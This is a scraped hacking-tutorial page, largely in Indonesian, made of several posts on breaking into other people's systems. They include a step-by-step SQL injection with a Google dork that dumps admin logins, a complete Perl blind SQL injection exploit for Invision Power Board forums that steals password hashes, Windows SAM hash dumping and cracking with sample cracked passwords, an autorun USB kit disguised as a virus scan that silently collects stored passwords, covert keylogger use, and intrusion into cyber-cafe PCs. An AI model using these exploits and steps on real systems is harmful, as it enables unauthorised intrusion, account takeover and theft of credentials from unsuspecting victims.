11 SQL Injection Web dengan Dork

SQL injection merupakan aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. Langsung aja ya ke permasalahannya yaitu Teknik SQL Injection dengan Dork namun Sebelum men daface sebuah situs, kita bisa menggunakan dork Sql Injection dengan bantuan om google
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
Misal yang didapat :
http://www.targetweb.com/detailproduct.php?id=35
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
http://www.targetweb.com/detailproduct.php?id=35'


Setelah itu akan muncul bug pesan error :
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1

Untuk mencari column gunakan perintah [ order by ]
http://www.targetweb.com/detailproduct.php?id=35 order by 1--
mulai dari angka 1,2,3 dan seterusnya hingga menemukan pesan error selanjutnya 2, dst sampe muncul pesan error "Unknown column '17' in 'order clause'"
Pesan error muncul pada angka 17
http://www.targetweb.com/detailproduct.php?id=35 order by 17--
muncul pesan error:
Unknown column '17' in 'order clause'

Jadi angka yang diambil adalah 17-1 = 16 (jumlah column adalah 16)

Berikutnya kita akan mencari "angka" dimana dengan angka tersebut kita bisa melakukan injection dengan perintah "union all select"
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 35

akan muncul "angka" : 4, 7 dan 13
Pilih salah satunya saja, misal 4
Langsung kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 4
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--

Nanti diweb tersebut akan muncul tulisan :
5.0.91-community
Ternyata versi 5, kalau versi 4 lain waktu akan saya bahas.

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka dan menambahkan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 16
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--

Akan muncul nama-nama table :
login,tbanner,tcatprod,tproduct,tset dan lain-lain

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka 4 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
http://www.targetweb.com/detailproduct.php?id=-35 union all select
1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 4 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan " user " dan column 2 dengan " pass "
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan " login " untuk mengambil informasi dari table yang bernama
"login"
http://www.targetweb.com/detailproduct.php?id=-35 union all select
1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16+from+login--

hasil : admin:admin
jadi,
user = admin
password = admin

Selesai pencarian User dan Password, dilanjutkan ke pencarian Page Admin.
Untuk mencari page admin, gunakan aplikasi berikut:
Instant SQLI
Atau juga bisa gunakan Aplikasi Havij

NB: ini saya ambil dari tutor yang saya baca dan sedikit saya ubah bahasa penulisan dan web tujuan.

6 Menggunakan Refog Keylogger

REFOG Keylogger merupakan software berlisensi shareware yang mempunyai kegunaan untuk memantau aktifitas dalam penggunaan komputer. Apa saja aktiftas yang di lakukan bisa di catat dan tersimpan dalam file log. Software REFOG Keylogger ini semacam software spy alias software mata mata.

REFOG Keylogger ini dapat mencatat apa apa saja yang dilakukan orang dalam menggunakan komputer. Misalkan orang itu mengakses situs apa saja yang di kunjungi, menjalankan program apa dan aktifitas lainnya.

Software REFOG Keylogger ini cocok juga buat anda yang memiliki anak dan anak anda itu sudah di berikan hak penuh atas penggunaan komputer yang anda berikan. Apalagi jika anak anda telah diberikan akses internet pada komputer. Dengan software REFOG Keylogger ini, anda bisa memantau situs apa saja yang dikunjungi oleh si anak.

Setelah anda install REFOG Keylogger ini ke dalam komputer yang ingin anda pantau, maka REFOG Keylogger ini akan berjalan tersembunyi, segala aktifitas dalam penggunakan komputer dan user sapa saja yang meng-akses komputer akan tercatat dan tersimpan dalam sebuah file log.

Software REFOG Keylogger ini bisa anda download disitus bawah ini:
Refog
atau
Cnet

2 Cracking Password Windows Via Backtrack 4

Untuk kali ini kita akan mencoba cracking password windows via backtrack 4 live CD (kamsudnya dengan booting melalui CD backtrack 4), sebetulnya tutorial ini pernah di buat oleh ncang assadotcom di JS dengan menggunakan BT 2 kalo gak salah, tapi untuk kali ini ane coba di BT 4 prefinal.

1.Pertama setting di bios anda booting dari CD
2.Kemudian masuk ke BT seperti biasa dengan perintah startx
3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:

untuk mengakses file window dan mounting di BT
root@backtrackers:~# mountconfig

maka akan muncul tampilan Disk & FileSystem Configuration, selanjutnya di situ kita bisa lihat bahwa drive C: windows terletak di partisi 1, atau kita bisa analisa satu persatu kok. Klik di partisi tersebut lalu klik new untuk merubah mountingnya. Lalu configurasi sbb:
Type: Automatic
Mount Point: /mnt/sda1 (kalo belum ada folder sda1 nya silahkan di buat yah)
Device: /dev/sda1/
pastikan posisinya udah enable alias warna ijo......

selanjutnya lakukan mounting dengan perintah:
root@backtrackers:~# mount /dev/sda1 /mnt/sda1
maka drive window sudah bisa kita akses di bt
lalu lihat secara detail file windowsnya, bisa juga kita lihat di explorer nya bt dimana letak file SAM nya.

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config/SAM -rwxrwxrwx 1 root root 262144 2009-11-10 00:17 /mnt/sda1/WINDOWS /system32/config/SAM

untuk selanjutnya windows menyembunyikan sistem proteksi file SAM nya di file yg bernama syskey yang terletak di direktori berikut:
root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config
total 31916
-rwxrwxrwx 1 root root 6029312 2009-11-11 01:23 system
(karena terlalu banyak untuk di tampilkan, jadi gwe capture aja file target kita, yaitu system)

okey kita udah dapet yg namanya file system, dan untuk selanjutnya kita akan capture file syskey tersebut dan kita jadikan sebuah file dengan program yg namanya bkhive yang terletak di :
aplikasi > backtrak > privilege escalation > password attack > offline attack > bkhive

atau langsung ketik di console juga gpp, gak dosa kok :)), disini nama file output yg gwe buat adalah wsyskey (buat penamaan terserah lo pada deh, mau bikin asiacarerasyskey atau tukul_syskey juga ga jadi masalah ;)) )

root@backtrackers:~# bkhive /mnt/sda1/WINDOWS/system32/config/system wsyskey
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 0c7b80c915ccc01cd4e949af7ebdde90

okey kita udah berhasil membuat file syskeynya, bisa di liat kok (gwe simpern filenya di /root)
root@backtrackers:~# ls -l
-rw-r--r-- 1 root root 16 2009-11-10 23:01 wsyskey

selanjutnya untuk melihat file yg terenkripsi didalam file system kita gunakan program samdump2
aplikasi > backtrak > privilege escalation > password attack > offline attack > samdump2

so yang artinya, jadi.., masukin perintah begono noh......, sehingga muncullah beberapa login yg ada di windows yg udah kita dump dari file sam

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

sekanjutnya...., eh sori.., selanjutnya kamsudnya....., kita rubah file wsyskey tadi menjadi file hash dalam ekstensi .txt , selanjutnya filenya ane kasih nama whash.txt

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey > whash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM

lalu liat kembali apa file tersebut udah jadi apa belon.....
root@backtrackers:~# ls -l
total 162944
-rw-r--r-- 1 root root 431 2009-11-10 23:05 whash.txt
nah lo udah ngonol...eh nongol dia...... ;)) , lalu liat isinya dengan perintah cat

root@backtrackers:~# cat whash.txt
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

nah udah nongol lagi dah.., file2 user login dengan enkripsi hash nya, dan untuk selanjutnya kita akan crack file hash tersebut dengan program di bt4 prefinal yg namanya john (bukan john banting yah ,, hehehe) yang ada di
aplikasi > backtrak > privilege escalation > password attack > offline attack > john

root@backtrackers:/pentest/passwords/jtr# ./john /root/whash.txt

sehingga si bang john akan mengcrack file hash yg ada di file whash.txt tersebut yang kemudian menampilkan password windows tersebut, dalam proses crackingnya program ini seolah2 seperti hang, padahal dia sedang melakukan bruteforce terhadap file tersebut sehingga jika kita tidak akan menunggu lebih lama kita tekan aja control c untuk men setop prosesnya.

Karena bang john tidak bisa membedakan huruf besar kecil dan besar maka kita lihat file yg di simpen bang john di direktori dia sendiri yaitu
root@backtrackers:~# cat /pentest/passwords/jtr/john.pot
$1$xd5xuJYT$x6un0Ho.gXVCv4ZduhsYQ.:toor
$LM$aad3b435b51404ee:
$LM$f4227b3697fb5b7c:SEKSI
$LM$b75e0c8d76954a50:GANTENG123

dan yang terkahir setelah kita lihat di direktori bang john kembali kita tampilkan file pamungkas dengan perintah cat

root@backtrackers:/pentest/passwords/jtr# ./john --show /root/whash.txt

maka terlihatlah password untuk
vinblackganteng: ganteng123
juliaperes: SEKSI

NB:
1. untuk proses crackingnya terkadang penggunaan password yg panjang dan multikarakter sepertinya bang john cukup kesulitan atau memakan waktu lama (perasaan ane sih, mungkin ada temen2 laen yg punya teknik sendiri atau solusi, yang jelas file hash nya udah kita dapetin)
2. dalam proses cracking ini bang john tidak akan mengulangi lagi terhadap file yang udah di cracknya, jadi walaupun kita mengulanginya sampai 10 kali, si john tetap pada pendiriannya yaitu cracking yg pertama.

Source: xcode

5 The Hacker's Underground

.
Ingin belajar menjadi hacker tapi tidak tahu memulai dari mana? Buku ini adalah salah satu jawabanya. The Hacker's Underground Handbook mengulas berbagai teknik hacking yang populer digunakan. Dari teknik hacking sederhana sampai pada teknik intermediate dan advanced. Disusun oleh David Melnichuk, pendiri blog yang membahas hacking dan keamanan. Anda dapat mengunjungi blognya di http://mrcracker.com.



Daftar isi buku The Hacker's Underground Handbook :

Pendahuluan
- Apa itu Hacker?
- Hacker dan penggolonganya
- Mengapa menjadi seorang Hacker

Pemrograman
- Perlukah mempelajarinya?
- Dimana saya harus memulai?
- Cara belajar terbaik

Password
- Password Cracking
- Phising
- Program-program pencuri password

Network Hacking
- Foot Printing
- Port Scanning
- Banner Grabbing
- Searching the Vulnerabilities
- Penetrating

Wirelless Hacking
- Scanning wireless network
- Cracking WEP
- Packet Sniffing

Windows Hacking
- NetBios
- Cracking windows password

Malware
- Definisi
- Prorat

Web Hacking
- Cross site scripting
- Remote file inclusion
- Local file inclusion

4 Hack Password with ur Pen Drive

.
USB TRICKS:

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe andpasswordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Source: Go-Hacking

0 Hack into Forums

.
Hack into Fourms : Tutorial

This is what you like to call “Hacking a forum”.

I call it “Cracking into a forum” … Learn what hacking means you lazy fucks, lol…

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.

So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1?. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2?.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2?.

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

#!/usr/bin/perl -w

################################################## ################

# This one actually works http://www.quantriweb.com/forum/images/smilies/smile.gif Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com (http://remusomega.com/)

################################################## ################


use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ua->agent(“Mosiac 1.0? . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}

if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;

my $user = $ARGV[1]; # userid to jack


my $iver = $ARGV[2]; # version 1 or 2

my $cpre = $ARGV[3]; # cookie prefix

my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])

{

print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;

exit;

}


my @charset = (“0?,”1?,”2?,”3?,”4?,”5?,”6?,”7?,”8?,”9?,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < 33; $i++ )

{

for( $j=0; $j < 16; $j++ )

{

my $current = $charset[$j];


my $sql = ( $iver < 2 ) ?

“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :

“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;

my @cookie = (‘Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);

my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this


# does not appear anywhere in the sources

$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )

{

$outputs .= $current;

print “$current\n”;


last;

}

}

if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }

}

print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;

exit;

What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.

How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.

Your going to want to go and get ActivePerl. I am sure it’s here somewhere in Appz.

Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting “OK”.

So now you have Perl installed. Open up “My Computer”, and then click on “Local Disk (C:/)”. In there, you should see a folder named “Perl”. Open up that folder, and within “Perl”, you should see another folder named “bin”. Open up “bin”. Now that your in, drag and drop “ipb.pl” from your desktop, into “bin”.

Alrighty. Now everything is fine, and you’re ready to Pwn some FAGS …

What your going to want to do now, is open up your command prompt. If you don’t know how, please quit this site, and die…. Start – Run – CMD

Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:

cd C:\Perl\bin

Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:

perl ipb.pl

So, this is what we need to do. Type the following command into your command prompt:

ipb.pl http://hackingsite.com/forum 2 1

Obviously replace “http://hackingsite.com/forum” with the URL to the forum you wish to hack.

Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don’t be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.

Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f

But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person’s password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash’s before continuing reading.

Done? You understand the very basics of MD5s? Good. You’re probably thinking: I just read that MD5 hashes cannot be cracked!

LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.

There are many places online where you can enter hashes to be cracked. Personally, I use “Cain & Able”, which is a great MD5 cracker availiable at ‘http://odix.it’.

You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.

CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up

But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?

Well, you can spoof your cookie!

If you would like to learn more on spoofing cookies, use the friendly searching site they call “GOOGLE”

Good luck!

Source: Go-Hacking

1 Hack Closed PC on Cyber cafe

.
Hack Closed PC on Cyber Cafe:

So here is a quick new hack on how to intrude in the PC which is shut downed at Cyber cafe. (Don’t Forget to read our disclaimer at the bottom of the post.)

1. As you all must have know these days all Cyber cafe owners have a program for administration to control all PC’s in local area network. So all files can be inter transmitted.

2. First of all press Ctrl+Alt+Del the task manager or any controlling application, will open. Then from APPLICATIONS select the program that is controlling all PC’s & terminate it, This is for security reason. Now log of PC, & you ll get user names of the PC.

3. But some times, cyber cafes have security clients installed that have restricted access to Task Manager, restart the computer & press F8 continuously before windows boots.

The Menu will open, select Safe Mode from it. And now you can copy files from networked PC’s without any security layer.

Next step is where you’ll need to crack the hashes. SO go to your home PC , Download & install Saminside cracking tool. And from some another Cyber cafe try to crack the hashes of that PC. By same log off method explained below.

This where you actually perform hacking. Have a gret time & tell us weather it worked for you.

Meanwhile if you can get IP address, of the PC you wish to hack try to get it from ip-explorer.com, but this is not the part of this hack its sort of next step of hacking from outside the network.

Disclaimer : The trick here explained it for educational purpose only & not to perform illegal or criminal activities. Don’t forget hacking into some one’s privacy is considered as crime. SO do it on your home network that you own or something. We are not responsible for anything you do & consequences of it by using our articles.

Source: Go-Hacking

1 Cara Hack Windows

Disini saya informasikan tentang cara hacking Windows, maka di sini anda bisa memperoleh tentang cara belajar hack sederhana pada Windows. Namun, perlu diketahui bahwa tips dan trik kesempatan ini hanya digunakan untuk tujuan pembelajaran.

1. Ketika komputer starts up, tekan F8 pada keyboard sebelum anda melihat layar "Windows Starting". Akan terbuka sebuah sebuah layar dengan dengan berbagai pilihan. Selanjutnya pilih "Safe Mode with Command Prompt", dan Anda kemudian dapat melakukan sesuatu seperti yang Anda inginkan :)

2. Dialog akan muncul: dengan menggunakan tanda panah ke bawah, pilih "All Files". Kemudian akan muncul nama file: Batch.bat. Buka file dimana anda menyimpannya yang akan membuka Command Prompt.3. Namun, jika notepad pada komputer anda telah diblokir , Anda dapat dengan mudah masuk ke halaman web dan kemudian buka "View>View Source". Cara ini sangat mudah untuk membuka Notepad.

4. Setelah itu, Anda akan dapat melakukan seperti yang anda inginkan di dalam command prompt. Berikut adalah cara untuk menambah atau menghapus account:

* Tambah Account: C:>net user USERNAME /add
* Ganti password: C:>net user USERNAME *Anda akan langsung dapat memasukkan password baru untuk account anda. Jika Anda hanya menekan enter tanpa mengetik apa-apa, password account akan di reset..
* Hapus Account: C:> net localgroup Administrators # # Cara lain adalah dengan membuka notepad, (jika tidak diblokir), dan ketik "command.com". Kemudian buka File-> Save As. J USERNAME / ADD

Nah jika administratornya di password juga, anda masih bisa menjebolnya/mengaksesnya dengan menggunakan software OPHCRACK..

Ophcrack adalah Windows password cracker yang bekerja berdasarkan time-memory trade-off dengan menggunakan rainbow tables. Variant terbaru buatan Hellman original trade-off ini memberikan hasil yang sangat menakjubkan tentu saja dengan performance yang hebat. Progaram ini di claim mampu me recover 99.9% alphanumeric passwords dalam hitungan detik.

Lebih detailnya tentang ophcrackdan mendownloadnya silakan anda berkunjung ke websitenya